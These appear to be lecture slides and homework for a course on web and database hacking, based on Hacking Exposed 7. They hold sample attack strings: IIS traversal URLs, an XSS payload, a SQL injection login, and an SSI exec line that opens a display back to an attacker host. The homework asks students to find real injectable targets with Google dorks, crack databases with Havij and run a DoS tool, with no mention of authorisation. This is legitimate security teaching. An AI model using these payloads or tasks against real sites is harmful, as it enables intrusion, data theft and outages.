Hacking Exposed 7 Network Security Secrets & Solutions Chapter 10 Web and Database Hacking

Outline Web Server Hacking Web Application Hacking Sample Files and Source Code Disclosure Canonicalization Attacks and Server Extensions Buffer Overflows and Denial of Service Vulnerability Scanners Web Application Hacking Googledorks and Web Crawling Assessment and Analysis Web Application Security Scanners Common Web Application Vulnerabilities Database Hacking Database Discovery Database Vulnerabilities Other Considerations Summary

HBGary Federal Attacked by “Anonymous” in 2011 Victim: security startup – HBGary Federal Hackers: “Anonymous” SQL injection vulnerability in their CMS (content management system) Foreign parameters passed to CMS SQL database Reveal usernames, email addresses, password hashes Offline cracked MD5 password hashes with rainbow tables Same passwords used in Twitter, Linkedln, Facebook, and email accounts Glibc privilege escalation attack to gain root to get into email systems Anonymous published gigabytes of emails of HBGary Federal employees

Web Server Hacking Sample Files and Source Code Disclosure Example: Microsoft’s IIS 4.0 Sample code was installed by default showcode.asp and codebrews.asp These files enable an attacker to view almost any file on the server like this: http://192.168.51.101/msadc/Samples/SELECTOR/showcode.asp?source=/../.. /../../../boot.ini http://192.168.51.101/iissamples/exair/howitworks/codebrws.asp?source= /../../../../../winnt/repair/setup.log Solution Remove them from production web servers Source Code Disclosure Example: IIS +.htr vulnerability IIS 4 and 5 could reveal portions of source code through the HTR vulnerability Attack URLs: http://www.iisvictim.example/global.asa+.htr Never store sensitive data in your application source code

Web Server Hacking Canonicalization Attacks and Server Extensions The process of resolving a resource to a standard name is called canonicalization Example: ASP::$DATA vulnerability in Microsoft’s IIS Affected IIS 4 and earlier versions ASP DATA issue could reveal source code Just adding ::$DATA to the end of an ASP page's URL revealed the source code http://192.168.51.101/file.asp::$DATA Solution Compartmentalize your application directory structure Server Extensions Example: Microsoft WebDAV "Translate: f" problem Add "translate: f" to header of the HTTP GET request, and a \ to the end of the URL This problem could reveal source code Patching or disabling the vulnerable extension

Web Server Hacking Buffer Overflows and Denial of Service Example: IIS HTR Chunked Encoding Transfer Heap Overflow Affects Microsoft IIS 4.0, 5.0, and 5.1 HTTP request whose data contains 'Transfer-Encoding: chunked' with the file name ending with ".htr" Leads to remote denial of service or remote code execution at the privilege level Solution Apply a software patch, preferably from a reliable source Denial of Service Example: The Jester’s tool XerXes Appears to perform layer 7 attacks Limit the number of POST parameters to 10,000

Web Server Hacking Vulnerability Scanners Nikto Comprehensive tests against web servers for web server vulnerabilities PROS CONS Update by simple command Does not take IP range as input CSV format Not support digest or NTLM authentication Support SSL Cannot perform check with cookies Capture cookie from web server Support nmap output as inputs Support multiple IDS evasion techniques

Web Server Hacking Vulnerability Scanners Nessus Network vulnerability scanner for known server vulnerabilities PROS CONS Have GUI Not directly focus on web server Client/server architecture auto test Real time updates to the scan database require a subscription Target can be scanned automatically Limited http authentication support Provide proxy support with authentication

Web Application Hacking Googledorks and Web Crawling Finding Vulnerable Web Apps with Google (Googledorks) Example: “Index of /password” Site: http://www.exploit-db.com/google-dorks/ Web Crawling Static and dynamic pages Include and other support files Source code Server response headers Cookies Web-crawling Tools Wget HTTrack

Web Application Hacking Assessment and Analyze Web Application Assessment Authentication Session management Database interaction Generic input validation Application logic Tool example: WebScarab Allows user to intercept and alter HTTP Includes spidering and fuzzing Runs on any platform Analyze Browser plug-ins Modify the data and send to the remote server Free tool suites Built around web proxies between the web client and the web server

Web Application Hacking Web Application Security Scanners Server Analyzer Tool example: Nmap A tool to fingerprint and identify the software running a web server Web Brute Tool example: Nessus Checks authentication interfaces for weak credentials Web Discovery Port scanner Web Proxy Tool example: Burp Suite Local man-in-the-middle analysis tool for disassembling web communications Tool: Burp Suite Proxy, Repeater, Sequencer, Spider Powerful tool to craft automated attacks

Common Web Application Vulnerabilities Cross-Site Scripting (XSS) Targeted at other users of the vulnerable application: post-to-propagate Example: http://localhost/page.asp?var=<script>alert(‘Test’)<script> Countermeasures: Filter out input parameters for special characters SQL Injection Request for dynamic content  SQL query with request parameters Example: Username: ‘ or 1=1- Countermeasures: (1) Use bind variables (2) Lock down the database server configuration (3) Implement default error handling Cross-Site Request Forgery (CSRF) Example: Send a fake POST request to a server Countermeasures: Authenticated session HTTP Response Splitting Example: Click a specially crafted hyperlink in a malicious website Countermeasures: Solid input validation on server input Misuse of Hidden Tags Example: <input type=hidden name=“price” price=“100”>, hacker can change the price by himself Countermeasures: Limit the use of hidden tags Server Side Includes (SSIs) Example: <!--#exec cmd=“/usr/X11R6/bin/xterm –display attacker:0 &”--> Countermeasures: Strip out any unauthorized SSI line

Database Hacking Database Discovery Example: Nmap Countermeasures Never expose your databases directly to the Internet Run intrusion detection tools to identify network port scanning attempts

Database Hacking Database Vulnerabilities Network attacks Example: CVE-2012-0072, listener vulnerability that can be exploited without any privileges Countermeasures: Limit IP addresses to access the database Database engine bugs Example: Use buffer overflows to gain full control of the database Countermeasures: Apply DBMS vendor patches Weak or default passwords Countermeasures: Alert users to weak and default passwords Misconfigurations Example: Leaving listening components without using management passwords at all Countermeasures: Periodically scan your databases Indirect attacks Example: Install a keylogger on the database administrator’s machine Countermeasures: Do not click untrusted/unknown links Tool Example: Havij Havij is one of the best Automatic SQL injection tools

Database Hacking Infecting more machines Other Considerations Infecting more machines Attackers infect database tables with malicious scripts The user’s browser receives a script from the attacker’s site => infecting the user’s machine

Summary Web and database hacking has become an increasingly more visible and relevant threat Secure by keeping up with patches and best-practice configurations The importance of validating all user inputs and outputs

Homework Ch10 (30 points) Google Dork (30 points) Havij Using googledork to find a target which can be injected. Explain why this target can be injected. Explain how to avoid it. (30 points) Havij Install Havij. Explain how to use this tool. Using Havij to crack a database. (60 points) SQL injection Try to use SQL injection to crack a web application. Explain why this web application can be cracked. (30 points) Burp Suite Install Burp Suite. Using Burp Suite to scan a target, what kind of information can you get? (40 points) Browser plug-in Introduce a Browser plug-in on chrome or firefox which can do web application hacking. Explain how to use this tool, and show your results. Bonus (40 points) Using XerXes to do DoS attack.

Homework #6 Ch9-Ch10 (150 points) Due: 6/15 (Mon) in the class in printed hardcopy (format: problem, solution with explanation, screen dumps) (60 points) Hacking (a game) ROM 1) Learn how to hack a game ROM from this link http://www.nintendoage.com/forum/messageview.cfm?catid=22&threadid=19733 2) Change 2 PLAYER GAME in menu to 2 Your Name GAME, e.g., I change the 2 PLAYER GAME to 2 EKARAT GAME. Capture and paste your change. * You can download the target game rom (Super Mario Adventure (SMB1 Hack).nes) at the course webpage.

Homework #6 Ch9-Ch10 (150 points) (2/2) 2. (30 points) Use your Hex editor to modify any programs you want, and tell us 1) What is the target program? 2) What is your modification? Show the captured screen of the result. 3. (30 points) Havij Install Havij. Explain how to use this tool to crack a database. 4. (30 points) Burp Suite Install Burp Suite. Explain how to use this tool. Using Burp Suite to scan a target, what kind of information can you get?